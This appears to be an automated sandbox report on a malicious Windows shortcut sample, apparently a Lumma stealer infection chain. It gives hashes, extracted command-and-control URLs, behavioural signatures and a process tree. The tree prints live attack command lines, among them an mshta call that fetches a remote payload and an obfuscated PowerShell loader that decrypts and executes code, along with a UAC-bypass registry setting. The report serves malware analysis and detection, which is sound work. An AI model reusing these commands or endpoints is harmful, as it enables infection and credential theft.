Analysis
Max time kernel: 147s
Max time network: 152s
Platform: windows10-2004_x64
Resource: win10v2004-20240226-en
Resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
Submitted: 27-02-2024 05:21
Static task: static1
Behavioral task: behavioral1
Sample: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Resource: win7-20240221-en
General
Target: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
Size: 1KB
MD5: c7945d1c593363055616d6e427b8e2a2
SHA1: 2c5f9b6fc746efb5caad3b31755c801f9ad1ac7b
SHA256: 707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50
SHA512: 7fb10ad46450b7ceeebdf3e9144447c59c22c67a6c7d026a1dbebcb665ee6bf1588958c5388e0358f18ecf71539dfd67050bb7ffeb516d2904d5cd77a1786d19
Malware Config
Extracted:
  https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
Extracted (lumma):
  https://executivebrakeji.shop/api
  https://technologyenterdo.shop/api
  https://detectordiscusser.shop/api
  https://turkeyunlikelyofw.shop/api
  https://associationokeo.shop/api
Signatures

UAC bypass
Processes:
description | ioc | process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | powershell.exe

Blocklisted process makes network request (3 IoCs)
Processes:
flow | pid | process
14 | 2300 | mshta.exe
18 | 2300 | mshta.exe
20 | 4440 | powershell.exe

Downloads MZ/PE file

Checks computer location settings (2 TTPs, 2 IoCs)
Looks up country code configured in the registry, likely geofence.
Processes:
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation | mshta.exe

Executes dropped EXE (1 IoC)
Processes:
pid | process
2228 | driver.exe

Drops desktop.ini file(s) (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Users\Admin\Videos\Captures\desktop.ini | svchost.exe

Suspicious use of SetThreadContext (1 IoC)
Processes:
description | pid | process | target process
PID 2228 set thread context of 1624 | 2228 | driver.exe | RegAsm.exe

Drops file in Windows directory (1 IoC)
Processes:
description | ioc | process
File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes:
description | ioc | process
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | svchost.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | svchost.exe

Modifies registry class (1 IoC)
Processes:
description | ioc | process
Key created | \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-609813121-2907144057-1731107329-1000\{95469607-7B9A-455B-8133-0B85F82F9C00} | svchost.exe

Suspicious behavior: EnumeratesProcesses (6 IoCs)
Processes:
pid | process
2844 | powershell.exe
2844 | powershell.exe
4420 | powershell.exe
4420 | powershell.exe
4440 | powershell.exe
4440 | powershell.exe

Suspicious use of AdjustPrivilegeToken (3 IoCs)
Processes:
description | pid | process
Token: SeDebugPrivilege | 2844 | powershell.exe
Token: SeDebugPrivilege | 4420 | powershell.exe
Token: SeDebugPrivilege | 4440 | powershell.exe

Suspicious use of SetWindowsHookEx (1 IoC)
Processes:
pid | process
3852 | OpenWith.exe

Suspicious use of WriteProcessMemory (25 IoCs)
Processes:
description | pid | process | target process
PID 2340 wrote to memory of 1956 | 2340 | cmd.exe | forfiles.exe
PID 2340 wrote to memory of 1956 | 2340 | cmd.exe | forfiles.exe
PID 1956 wrote to memory of 2844 | 1956 | forfiles.exe | powershell.exe
PID 1956 wrote to memory of 2844 | 1956 | forfiles.exe | powershell.exe
PID 2844 wrote to memory of 2300 | 2844 | powershell.exe | mshta.exe
PID 2844 wrote to memory of 2300 | 2844 | powershell.exe | mshta.exe
PID 2300 wrote to memory of 4420 | 2300 | mshta.exe | powershell.exe
PID 2300 wrote to memory of 4420 | 2300 | mshta.exe | powershell.exe
PID 4420 wrote to memory of 4440 | 4420 | powershell.exe | powershell.exe
PID 4420 wrote to memory of 4440 | 4420 | powershell.exe | powershell.exe
PID 4440 wrote to memory of 2228 | 4440 | powershell.exe | driver.exe
PID 4440 wrote to memory of 2228 | 4440 | powershell.exe | driver.exe
PID 4440 wrote to memory of 2228 | 4440 | powershell.exe | driver.exe
PID 2228 wrote to memory of 4500 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 4500 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 4500 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
PID 2228 wrote to memory of 1624 | 2228 | driver.exe | RegAsm.exe
Processes

C:\Windows\system32\cmd.exe
  Command line: cmd /c C:\Users\Admin\AppData\Local\Temp\707e623b27d794685b3b0a24d1dafe035274f62535fa67934eb1a4d39d3d9b50.lnk
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  PID: 2340

  C:\Windows\System32\forfiles.exe
    Command line: "C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
    - Suspicious use of WriteProcessMemory
    PID: 1956

    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      Command line: start mshta https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 2844

      C:\Windows\system32\mshta.exe
        Command line: "C:\Windows\system32\mshta.exe" https://dl.dropboxusercontent.com/scl/fi/aur0asu195akuhc7q88lq/mlwr?rlkey=ltpi9kve7882q0vksvvb54han
        - Blocklisted process makes network request
        - Checks computer location settings
        - Suspicious use of WriteProcessMemory
        PID: 2300

        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $xRnrtl = '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';$PWFaA = 'd0hDTktlemN0SlFHRXFla0Rjb094cnRoUGlSR050VmI=';$rtbrSxS = New-Object 'System.Security.Cryptography.AesManaged';$rtbrSxS.Mode = [System.Security.Cryptography.CipherMode]::ECB;$rtbrSxS.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$rtbrSxS.BlockSize = 128;$rtbrSxS.KeySize = 256;$rtbrSxS.Key = [System.Convert]::FromBase64String($PWFaA);$jIXAy = [System.Convert]::FromBase64String($xRnrtl);$rSpXWojt = $jIXAy[0..15];$rtbrSxS.IV = $rSpXWojt;$mXooDLjjw = $rtbrSxS.CreateDecryptor();$KHnzkbgXQ = $mXooDLjjw.TransformFinalBlock($jIXAy, 16, $jIXAy.Length - 16);$rtbrSxS.Dispose();$iIauy = New-Object System.IO.MemoryStream( , $KHnzkbgXQ );$Izyrh = New-Object System.IO.MemoryStream;$thcRRYmqg = New-Object System.IO.Compression.GzipStream $iIauy, ([IO.Compression.CompressionMode]::Decompress);$thcRRYmqg.CopyTo( $Izyrh );$thcRRYmqg.Close();$iIauy.Close();[byte[]] $QWoIKfh = $Izyrh.ToArray();$KKSHrJAF = [System.Text.Encoding]::UTF8.GetString($QWoIKfh);$KKSHrJAF | powershell -
          - Drops file in Windows directory
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 4420

          C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -
            - UAC bypass
            - Blocklisted process makes network request
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
            - Suspicious use of WriteProcessMemory
            PID: 4440

            C:\Users\Admin\AppData\Roaming\driver.exe
              Command line: "C:\Users\Admin\AppData\Roaming\driver.exe"
              - Executes dropped EXE
              - Suspicious use of SetThreadContext
              - Suspicious use of WriteProcessMemory
              PID: 2228

              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                PID: 4500

              C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                Command line: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                PID: 1624

C:\Windows\system32\OpenWith.exe
  Command line: C:\Windows\system32\OpenWith.exe -Embedding
  - Suspicious use of SetWindowsHookEx
  PID: 3852

C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
  - Drops desktop.ini file(s)
  - Checks processor information in registry
  - Modifies registry class
  PID: 4864
Network
MITRE ATT&CK Enterprise v15
Downloads

Filesize: 64B
MD5: feadc4e1a70c13480ef147aca0c47bc0
SHA1: d7a5084c93842a290b24dacec0cd3904c2266819
SHA256: 5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac
SHA512: c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Filesize: 60B
MD5: d17fe0a3f47be24a6453e9ef58c94641
SHA1: 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256: 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512: 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Filesize: 297KB
MD5: 79ac171749690f2c947187e34d2b007d
SHA1: ebe8d99c87b7b6b51af10a1260271f7282c8f8d2
SHA256: cdb5f26a44a64a81c8e96db60ba2f4471f88b3980d14f91d3247a0afde34d441
SHA512: c93009d5e20a8ac008e409ad677674aeacc383f0716904825847330ad12ea7347d706754f9c8724e69c0261f2edcb36a41e40f851014e51021b1bccbf7a15f54

Filesize: 274KB
MD5: 45ff32c8f82fd612116ebd1b20fa1c19
SHA1: de91cdfa4b34d5526b2d99ad2cdd9f6e465b205e
SHA256: 864ed84452a92ae76f154f7abc10540674d5d4490c7c5202329c765ee80c3ae2
SHA512: e0fe7ec8bd84b32d352f9866339b8a589b8c95ec830d3b949162aa752e0f6cb74f9ec904493a727702b471226fdc156658319165443bc4faddabe837365f2992

Filesize: 190B
MD5: b0d27eaec71f1cd73b015f5ceeb15f9d
SHA1: 62264f8b5c2f5034a1e4143df6e8c787165fbc2f
SHA256: 86d9f822aeb989755fac82929e8db369b3f5f04117ef96fd76e3d5f920a501d2
SHA512: 7b5c9783a0a14b600b156825639d24cbbc000f5066c48ce9fecc195255603fc55129aaaca336d7ce6ad4e941d5492b756562f2c7a1d151fcfc2dabac76f3946c